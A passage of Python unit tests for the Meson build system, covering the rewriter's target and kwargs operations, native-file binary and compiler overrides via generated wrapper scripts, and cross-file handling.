['main.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']}, 'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']}, } } self.assertDictEqual(out, expected) def test_tatrget_add(self): self.prime('1 basic') self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'target': { 'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']}, 'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']}, 'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']}, } } self.assertDictEqual(out, expected) def test_target_remove_subdir(self): self.prime('2 subdirs') self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) self.assertDictEqual(out, {}) def test_target_add_subdir(self): self.prime('2 subdirs') self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = {'name': 'something', 'sources': ['first.c', 'second.c']} self.assertDictEqual(out['target']['94b671c@@something@exe'], expected) def test_target_source_sorting(self): self.prime('5 sorting') add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}]) inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}]) out = self.rewrite(self.builddir, add_json) out = self.rewrite(self.builddir, inf_json) expected = { 'target': { 'exe1@exe': { 'name': 'exe1', 'sources': [ 'aaa/a/a1.c', 'aaa/b/b1.c', 'aaa/b/b2.c', 'aaa/f1.c', 'aaa/f2.c', 'aaa/f3.c', 'bbb/a/b1.c', 'bbb/b/b2.c', 'bbb/c1/b5.c', 'bbb/c2/b7.c', 'bbb/c10/b6.c', 'bbb/a4.c', 'bbb/b3.c', 'bbb/b4.c', 'bbb/b5.c', 'a1.c', 'a2.c', 'a3.c', 'a10.c', 'a20.c', 'a30.c', 'a100.c', 'a101.c', 'a110.c', 'a210.c', 'a666.c', 'b1.c', 'c2.c' ] } } } self.assertDictEqual(out, expected) def test_target_same_name_skip(self): self.prime('4 same name targets') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = {'name': 'myExe', 'sources': ['main.cpp']} self.assertEqual(len(out['target']), 2) for val in out['target'].values(): self.assertDictEqual(expected, val) def test_kwargs_info(self): self.prime('3 kwargs') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1'}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_kwargs_set(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']}, 'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'}, 'dependency#dep1': {'required': True, 'method': 'cmake'} } } self.assertDictEqual(out, expected) def test_kwargs_add(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD', 'Boost']}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_kwargs_remove(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1', 'license': 'GPL'}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_kwargs_remove_regex(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1', 'default_options': 'debug=true'}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_kwargs_delete(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {}, 'target#tgt1': {}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_default_options_set(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) def test_default_options_delete(self): self.prime('3 kwargs') self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json')) out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'kwargs': { 'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']}, 'target#tgt1': {'build_by_default': True}, 'dependency#dep1': {'required': False} } } self.assertDictEqual(out, expected) class NativeFileTests(BasePlatformTests): def setUp(self): super().setUp() self.testcase = os.path.join(self.unit_test_dir, '47 native file binary') self.current_config = 0 self.current_wrapper = 0 def helper_create_native_file(self, values): """Create a config file as a temporary file. values should be a nested dictionary structure of {section: {key: value}} """ filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config)) self.current_config += 1 with open(filename, 'wt') as f: for section, entries in values.items(): f.write('[{}]\n'.format(section)) for k, v in entries.items(): if isinstance(v, (bool, int, float)): f.write("{}={}\n".format(k, v)) elif isinstance(v, list): f.write("{}=[{}]\n".format(k, ', '.join(["'{}'".format(w) for w in v]))) else: f.write("{}='{}'\n".format(k, v)) return filename def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs): """Creates a wrapper around a binary that overrides specific values.""" filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper)) extra_args = extra_args or {} self.current_wrapper += 1 if is_haiku(): chbang = '#!/bin/env python3' else: chbang = '#!/usr/bin/env python3' with open(filename, 'wt') as f: f.write(textwrap.dedent('''\ {} import argparse import subprocess import sys def main(): parser = argparse.ArgumentParser() '''.format(chbang))) for name in chain(extra_args, kwargs): f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name)) f.write(' args, extra_args = parser.parse_known_args()\n') for name, value in chain(extra_args.items(), kwargs.items()): f.write(' if args.{}:\n'.format(name)) f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout'))) f.write(' sys.exit(0)\n') f.write(textwrap.dedent(''' ret = subprocess.run( ["{}"] + extra_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(ret.stdout.decode('utf-8')) print(ret.stderr.decode('utf-8'), file=sys.stderr) sys.exit(ret.returncode) if __name__ == '__main__': main() '''.format(binary))) if not is_windows(): os.chmod(filename, 0o755) return filename # On windows we need yet another level of indirection, as cmd cannot # invoke python files itself, so instead we generate a .bat file, which # invokes our python wrapper batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper)) with open(batfile, 'wt') as f: f.write(r'@{} {} %*'.format(sys.executable, filename)) return batfile def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST): """Helper for generating tests for overriding compilers for langaugages with more than one implementation, such as C, C++, ObjC, ObjC++, and D. """ env = get_fake_env() getter = getattr(env, 'detect_{}_compiler'.format(lang)) getter = functools.partial(getter, for_machine) cc = getter() binary, newid = cb(cc) env.binaries[for_machine].binaries[lang] = binary compiler = getter() self.assertEqual(compiler.id, newid) def test_multiple_native_files_override(self): wrapper = self.helper_create_binary_wrapper('bash', version='foo') config = self.helper_create_native_file({'binaries': {'bash': wrapper}}) wrapper = self.helper_create_binary_wrapper('bash', version='12345') config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}}) self.init(self.testcase, extra_args=[ '--native-file', config, '--native-file', config2, '-Dcase=find_program']) # This test hangs on cygwin. @unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.') def test_native_file_is_pipe(self): fifo = os.path.join(self.builddir, 'native.file') os.mkfifo(fifo) with tempfile.TemporaryDirectory() as d: wrapper = self.helper_create_binary_wrapper('bash', d, version='12345') def filler(): with open(fifo, 'w') as f: f.write('[binaries]\n') f.write("bash = '{}'\n".format(wrapper)) thread = threading.Thread(target=filler) thread.start() self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program']) thread.join() os.unlink(fifo) self.init(self.testcase, extra_args=['--wipe']) def test_multiple_native_files(self): wrapper = self.helper_create_binary_wrapper('bash', version='12345') config = self.helper_create_native_file({'binaries': {'bash': wrapper}}) wrapper = self.helper_create_binary_wrapper('python') config2 = self.helper_create_native_file({'binaries': {'python': wrapper}}) self.init(self.testcase, extra_args=[ '--native-file', config, '--native-file', config2, '-Dcase=find_program']) def _simple_test(self, case, binary, entry=None): wrapper = self.helper_create_binary_wrapper(binary, version='12345') config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}}) self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)]) def test_find_program(self): self._simple_test('find_program', 'bash') def test_config_tool_dep(self): # Do the skip at this level to avoid screwing up the cache if mesonbuild.environment.detect_msys2_arch(): raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2') if not shutil.which('llvm-config'): raise unittest.SkipTest('No llvm-installed, cannot test') self._simple_test('config_dep', 'llvm-config') def test_python3_module(self): self._simple_test('python3', 'python3') def test_python_module(self): if is_windows(): # Bat adds extra crap to stdout, so the version check logic in the # python module breaks. This is fine on other OSes because they # don't need the extra indirection. raise unittest.SkipTest('bat indirection breaks internal sanity checks.') elif is_osx(): binary = 'python' else: binary = 'python2' # We not have python2, check for it for v in ['2', '2.7', '-2.7']: rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) if rc == 0: break else: raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.') self._simple_test('python', binary, entry='python') @unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard') @skip_if_env_set('CC') def test_c_compiler(self): def cb(comp): if comp.id == 'gcc': if not shutil.which('clang'): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'clang', 'clang' if not is_real_gnu_compiler(shutil.which('gcc')): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'gcc', 'gcc' self.helper_for_compiler('c', cb) @unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard') @skip_if_env_set('CXX') def test_cpp_compiler(self): def cb(comp): if comp.id == 'gcc': if not shutil.which('clang++'): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'clang++', 'clang' if not is_real_gnu_compiler(shutil.which('g++')): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'g++', 'gcc' self.helper_for_compiler('cpp', cb) @skip_if_not_language('objc') @skip_if_env_set('OBJC') def test_objc_compiler(self): def cb(comp): if comp.id == 'gcc': if not shutil.which('clang'): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'clang', 'clang' if not is_real_gnu_compiler(shutil.which('gcc')): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'gcc', 'gcc' self.helper_for_compiler('objc', cb) @skip_if_not_language('objcpp') @skip_if_env_set('OBJCXX') def test_objcpp_compiler(self): def cb(comp): if comp.id == 'gcc': if not shutil.which('clang++'): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'clang++', 'clang' if not is_real_gnu_compiler(shutil.which('g++')): raise unittest.SkipTest('Only one compiler found, cannot test.') return 'g++', 'gcc' self.helper_for_compiler('objcpp', cb) @skip_if_not_language('d') @skip_if_env_set('DC') def test_d_compiler(self): def cb(comp): if comp.id == 'dmd': if shutil.which('ldc'): return 'ldc', 'ldc' elif shutil.which('gdc'): return 'gdc', 'gdc' else: raise unittest.SkipTest('No alternative dlang compiler found.') if shutil.which('dmd'): return 'dmd', 'dmd' raise unittest.SkipTest('No alternative dlang compiler found.') self.helper_for_compiler('d', cb) @skip_if_not_language('cs') @skip_if_env_set('CSC') def test_cs_compiler(self): def cb(comp): if comp.id == 'csc': if not shutil.which('mcs'): raise unittest.SkipTest('No alternate C# implementation.') return 'mcs', 'mcs' if not shutil.which('csc'): raise unittest.SkipTest('No alternate C# implementation.') return 'csc', 'csc' self.helper_for_compiler('cs', cb) @skip_if_not_language('fortran') @skip_if_env_set('FC') def test_fortran_compiler(self): def cb(comp): if comp.id == 'lcc': if shutil.which('lfortran'): return 'lfortran', 'lcc' raise unittest.SkipTest('No alternate Fortran implementation.') elif comp.id == 'gcc': if shutil.which('ifort'): # There is an ICC for windows (windows build, linux host), # but we don't support that ATM so lets not worry about it. if is_windows(): return 'ifort', 'intel-cl' return 'ifort', 'intel' elif shutil.which('flang'): return 'flang', 'flang' elif shutil.which('pgfortran'): return 'pgfortran', 'pgi' # XXX: there are several other fortran compilers meson # supports, but I don't have any of them to test with raise unittest.SkipTest('No alternate Fortran implementation.') if not shutil.which('gfortran'): raise unittest.SkipTest('No alternate Fortran implementation.') return 'gfortran', 'gcc' self.helper_for_compiler('fortran', cb) def _single_implementation_compiler(self, lang: str, binary: str, version_str: str, version: str) -> None: """Helper for languages with a single (supported) implementation. Builds a wrapper around the compiler to override the version. """ wrapper = self.helper_create_binary_wrapper(binary, version=version_str) env = get_fake_env() getter = getattr(env, 'detect_{}_compiler'.format(lang)) getter = functools.partial(getter, MachineChoice.HOST) env.binaries.host.binaries[lang] = [wrapper] compiler = getter() self.assertEqual(compiler.version, version) @skip_if_not_language('vala') @skip_if_env_set('VALAC') def test_vala_compiler(self): self._single_implementation_compiler( 'vala', 'valac', 'Vala 1.2345', '1.2345') @skip_if_not_language('rust') @skip_if_env_set('RUSTC') def test_rust_compiler(self): self._single_implementation_compiler( 'rust', 'rustc', 'rustc 1.2345', '1.2345') @skip_if_not_language('java') def test_java_compiler(self): self._single_implementation_compiler( 'java', 'javac', 'javac 9.99.77', '9.99.77') @skip_if_not_language('swift') def test_swift_compiler(self): wrapper = self.helper_create_binary_wrapper( 'swiftc', version='Swift 1.2345', outfile='stderr', extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'}) env = get_fake_env() env.binaries.host.binaries['swift'] = [wrapper] compiler = env.detect_swift_compiler(MachineChoice.HOST) self.assertEqual(compiler.version, '1.2345') def test_native_file_dirs(self): testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile')]) def test_native_file_dirs_overriden(self): testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile'), '-Ddef_libdir=liblib', '-Dlibdir=liblib']) def test_compile_sys_path(self): """Compiling with a native file stored in a system path works. There was a bug which caused the paths to be stored incorrectly and would result in ninja invoking meson in an infinite loop. This tests for that by actually invoking ninja. """ testcase = os.path.join(self.common_test_dir, '1 trivial') # It really doesn't matter what's in the native file, just that it exists config = self.helper_create_native_file({'binaries': {'bash': 'false'}}) self.init(testcase, extra_args=['--native-file', config]) self.build() def test_user_options(self): testcase = os.path.join(self.common_test_dir, '41 options') for opt, value in [('testoption', 'some other val'), ('other_one', True), ('combo_opt', 'one'), ('array_opt', ['two']), ('integer_opt', 0), ('CaseSenSiTivE', 'SOME other Value'), ('CASESENSITIVE', 'some other Value')]: config = self.helper_create_native_file({'project options': {opt: value}}) with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testcase, extra_args=['--native-file', config]) self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option') def test_user_options_command_line_overrides(self): testcase = os.path.join(self.common_test_dir, '41 options') config = self.helper_create_native_file({'project options': {'other_one': True}}) self.init(testcase, extra_args=['--native-file', config, '-Dother_one=false']) def test_user_options_subproject(self): testcase = os.path.join(self.unit_test_dir, '80 user options for subproject') s = os.path.join(testcase, 'subprojects') if not os.path.exists(s): os.mkdir(s) s = os.path.join(s, 'sub') if not os.path.exists(s): sub = os.path.join(self.common_test_dir, '41 options') shutil.copytree(sub, s) for opt, value in [('testoption', 'some other val'), ('other_one', True), ('combo_opt', 'one'), ('array_opt', ['two']), ('integer_opt', 0)]: config = self.helper_create_native_file({'sub:project options': {opt: value}}) with self.assertRaises(subprocess.CalledProcessError) as cm: self.init(testcase, extra_args=['--native-file', config]) self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option') def test_option_bool(self): # Bools are allowed to be unquoted testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({'built-in options': {'werror': True}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: # Test that no-per subproject options are inherited from the parent if 'werror' in each['name']: self.assertEqual(each['value'], True) break else: self.fail('Did not find werror in build options?') def test_option_integer(self): # Bools are allowed to be unquoted testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({'built-in options': {'unity_size': 100}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: # Test that no-per subproject options are inherited from the parent if 'unity_size' in each['name']: self.assertEqual(each['value'], 100) break else: self.fail('Did not find unity_size in build options?') def test_builtin_options(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config = self.helper_create_native_file({'built-in options': {'cpp_std': 'c++14'}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'cpp_std': self.assertEqual(each['value'], 'c++14') break else: self.fail('Did not find werror in build options?') def test_builtin_options_conf_overrides_env(self): testcase = os.path.join(self.common_test_dir, '2 cpp') config = self.helper_create_native_file({'built-in options': {'pkg_config_path': '/foo'}}) self.init(testcase, extra_args=['--native-file', config], override_envvars={'PKG_CONFIG_PATH': '/bar'}) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'pkg_config_path': self.assertEqual(each['value'], ['/foo']) break else: self.fail('Did not find pkg_config_path in build options?') def test_builtin_options_subprojects(self): testcase = os.path.join(self.common_test_dir, '99 subproject subdir') config = self.helper_create_native_file({'built-in options': {'default_library': 'both', 'c_args': ['-Dfoo']}, 'sub:built-in options': {'default_library': 'static'}}) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') found = 0 for each in configuration: # Test that no-per subproject options are inherited from the parent if 'c_args' in each['name']: # This path will be hit twice, once for build and once for host, self.assertEqual(each['value'], ['-Dfoo']) found += 1 elif each['name'] == 'default_library': self.assertEqual(each['value'], 'both') found += 1 elif each['name'] == 'sub:default_library': self.assertEqual(each['value'], 'static') found += 1 self.assertEqual(found, 4, 'Did not find all three sections') def test_builtin_options_subprojects_overrides_buildfiles(self): # If the buildfile says subproject(... default_library: shared), ensure that's overwritten testcase = os.path.join(self.common_test_dir, '224 persubproject options') config = self.helper_create_native_file({'sub2:built-in options': {'default_library': 'shared'}}) with self.assertRaises((RuntimeError, subprocess.CalledProcessError)) as cm: self.init(testcase, extra_args=['--native-file', config]) if isinstance(cm, RuntimeError): check = str(cm.exception) else: check = cm.exception.stdout self.assertIn(check, 'Parent should override default_library') def test_builtin_options_subprojects_dont_inherits_parent_override(self): # If the buildfile says subproject(... default_library: shared), ensure that's overwritten testcase = os.path.join(self.common_test_dir, '224 persubproject options') config = self.helper_create_native_file({'built-in options': {'default_library': 'both'}}) self.init(testcase, extra_args=['--native-file', config]) def test_builtin_options_compiler_properties(self): # the properties section can have lang_args, and those need to be # overwritten by the built-in options testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'c_args': ['-DFOO']}, 'properties': {'c_args': ['-DBAR']}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'c_args': self.assertEqual(each['value'], ['-DFOO']) break else: self.fail('Did not find c_args in build options?') def test_builtin_options_compiler_properties_legacy(self): # The legacy placement in properties is still valid if a 'built-in # options' setting is present, but doesn't have the lang_args testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'default_library': 'static'}, 'properties': {'c_args': ['-DBAR']}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'c_args': self.assertEqual(each['value'], ['-DBAR']) break else: self.fail('Did not find c_args in build options?') def test_builtin_options_paths(self): # the properties section can have lang_args, and those need to be # overwritten by the built-in options testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'bindir': 'foo'}, 'paths': {'bindir': 'bar'}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'bindir': self.assertEqual(each['value'], 'foo') break else: self.fail('Did not find bindir in build options?') def test_builtin_options_paths_legacy(self): testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'default_library': 'static'}, 'paths': {'bindir': 'bar'}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'bindir': self.assertEqual(each['value'], 'bar') break else: self.fail('Did not find bindir in build options?') def test_builtin_options_paths_legacy(self): testcase = os.path.join(self.common_test_dir, '1 trivial') config = self.helper_create_native_file({ 'built-in options': {'default_library': 'static'}, 'paths': {'bindir': 'bar'}, }) self.init(testcase, extra_args=['--native-file', config]) configuration = self.introspect('--buildoptions') for each in configuration: if each['name'] == 'bindir': self.assertEqual(each['value'], 'bar') break else: self.fail('Did not find bindir in build options?') class CrossFileTests(BasePlatformTests): """Tests for cross file functionality not directly related to cross compiling. This is mainly aimed to testing overrides from cross files. """ def setUp(self): super().setUp() self.current_config = 0 self.current_wrapper = 0 def _cross_file_generator(self, *, needs_exe_wrapper: bool = False, exe_wrapper: T.Optional[T.List[str]] = None) -> str: if is_windows(): raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows') return textwrap.dedent(f"""\ [binaries] c = '{shutil.which('gcc' if is_sunos() else 'cc')}' ar = '{shutil.which('ar')}' strip = '{shutil.which('strip')}' exe_wrapper = {str(exe_wrapper) if exe_wrapper is not None else '[]'} [properties] needs_exe_wrapper = {needs_exe_wrapper} [host_machine] system = 'linux' cpu_family = 'x86' cpu = 'i686' endian = 'little' """) def _stub_exe_wrapper(self) -> str: return textwrap.dedent('''\ #!/usr/bin/env python3 import subprocess import sys sys.exit(subprocess.run(sys.argv[1:]).returncode) ''') def test_needs_exe_wrapper_true(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator(needs_exe_wrapper=True)) self.init(testdir, extra_args=['--cross-file=' + str(p)]) out = self.run_target('test') self.assertRegex(out, r'Skipped:\s*1\s*\n') def test_needs_exe_wrapper_false(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator(needs_exe_wrapper=False)) self.init(testdir, extra_args=['--cross-file=' + str(p)]) out = self.run_target('test') self.assertNotRegex(out, r'Skipped:\s*1\n') def test_needs_exe_wrapper_true_wrapper(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: s = Path(d) / 'wrapper.py' with s.open('wt') as f: f.write(self._stub_exe_wrapper()) s.chmod(0o774) p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator( needs_exe_wrapper=True, exe_wrapper=[str(s)])) self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true']) out = self.run_target('test') self.assertRegex(out, r'Ok:\s*3\s*\n') def test_cross_exe_passed_no_wrapper(self): testdir = os.path.join(self.unit_test_dir, '72 cross test passed') with tempfile.TemporaryDirectory() as d: p = Path(d) / 'crossfile' with p.open('wt') as f: f.write(self._cross_file_generator(needs_exe_wrapper=True)) self.init(testdir, extra_args=['--cross-file=' + str(p)]) self.build() out = self.run_target('test') self.assertRegex(out, r'Skipped:\s*1\s*\n') # The test uses mocking and thus requires that the current process is the # one to run the Meson steps. If we are using an external test executable # (most commonly in Debian autopkgtests) then the mocking won't work. @unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.') def test_cross_file_system_paths(self): if is_windows(): raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)') testdir = os.path.join(self.common_test_dir, '1 trivial') cross_content = self._cross_file_generator() with tempfile.TemporaryDirectory() as d: dir_ = os.path.join(d, 'meson', 'cross') os.makedirs(dir_) with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f: f.write(cross_content) name = os.path.basename(f.name) with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}): self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True) self.wipe() with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}): os.environ.pop('XDG_DATA_HOME', None) self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True) self.wipe() with tempfile.TemporaryDirectory() as d: dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross') os.makedirs(dir_) with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f: f.write(cross_content) name = os.path.basename(f.name) # If XDG_DATA_HOME is set in the environment running the # tests this test will fail, os mock the environment, pop # it, then test with mock.patch.dict(os.environ): os.environ.pop('XDG_DATA_HOME', None) with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)): self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True) self.wipe() def helper_create_cross_file(self, values): """Create a config file as a temporary file. values should be a nested dictionary structure of {section: {key: value}} """ filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config)) self.current_config += 1 with open(filename, 'wt') as f: for section, entries in values.items(): f.write('[{}]\n'.format(section)) for k, v in entries.items(): f.write("{}='{}'\n".format(k, v)) return filename def test_cross_file_dirs(self): testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile'), '--cross-file', os.path.join(testcase, 'crossfile'), '-Ddef_bindir=binbar', '-Ddef_datadir=databar', '-Ddef_includedir=includebar', '-Ddef_infodir=infobar', '-Ddef_libdir=libbar', '-Ddef_libexecdir=libexecbar', '-Ddef_localedir=localebar', '-Ddef_localstatedir=localstatebar', '-Ddef_mandir=manbar', '-Ddef_sbindir=sbinbar', '-Ddef_sharedstatedir=sharedstatebar', '-Ddef_sysconfdir=sysconfbar']) def test_cross_file_dirs_overriden(self): testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile'), '--cross-file', os.path.join(testcase, 'crossfile'), '-Ddef_libdir=liblib', '-Dlibdir=liblib', '-Ddef_bindir=binbar', '-Ddef_datadir=databar', '-Ddef_includedir=includebar', '-Ddef_infodir=infobar', '-Ddef_libexecdir=libexecbar', '-Ddef_localedir=localebar', '-Ddef_localstatedir=localstatebar', '-Ddef_mandir=manbar', '-Ddef_sbindir=sbinbar', '-Ddef_sharedstatedir=sharedstatebar', '-Ddef_sysconfdir=sysconfbar']) def test_cross_file_dirs_chain(self): # crossfile2 overrides crossfile overrides nativefile testcase = os.path.join(self.unit_test_dir, '60 native file override') self.init(testcase, default_args=False, extra_args=['--native-file', os.path.join(testcase, 'nativefile'), '--cross-file', os.path.join(testcase, 'crossfile'), '--cross-file', os.path.join(testcase, 'crossfile2'), '-Ddef_bindir=binbar2', '-Ddef_datadir=databar', '-Ddef_includedir=includebar', '-Ddef_infodir=infobar', '-Ddef_libdir=libbar', '-Ddef_libexecdir=libexecbar', '-Ddef_localedir=localebar', '-Ddef_localstatedir=localstatebar', '-Ddef_mandir=manbar', '-Ddef_sbindir=sbinbar', '-Ddef_sharedstatedir=sharedstatebar', '-Ddef_sysconfdir=sysconfbar']) def test_user_options(self): # This is just a touch test for 